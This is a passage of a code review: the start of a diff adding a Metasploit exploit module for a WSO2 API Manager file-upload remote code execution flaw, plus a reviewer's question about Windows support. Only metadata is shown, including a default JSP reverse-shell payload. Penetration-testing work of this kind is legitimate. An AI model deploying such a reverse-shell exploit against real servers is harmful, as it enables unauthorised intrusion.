modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb

```diff
@@ -0,0 +1,409 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  attr_accessor :bearer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WSO2 API Manager Documentation File Upload Remote Code Execution',
+        'Description' => %q{
+          A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions
+          (`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled
+          server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.
+        },
+        'Author' => [
+          'Siebene@ <@Siebene7>', # Discovery
+          'Heyder Andrade <@HeyderAndrade>', # metasploit module
+          'Redway Security <redwaysecurity.com>' # Writeup and PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/WSO2-2023-2988' ], # PoC
+          [ 'URL', 'https://blog.redwaysecurity.com/2024/11/wso2-4.2.0-remote-code-execution.html' ], # Writeup
+          [ 'URL', 'https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2023-2988/' ]
+        ],
+        'DefaultOptions' => {
+          'Payload' => 'java/jsp_shell_reverse_tcp',
+          'SSL' => true,
+          'RPORT' => 9443
+        },
+        'Platform' => %w[linux],
```

Comment:
Would this also support `windows`?
The module is currently an `exploit/multi`, but only specifies `linux` as a valid platform.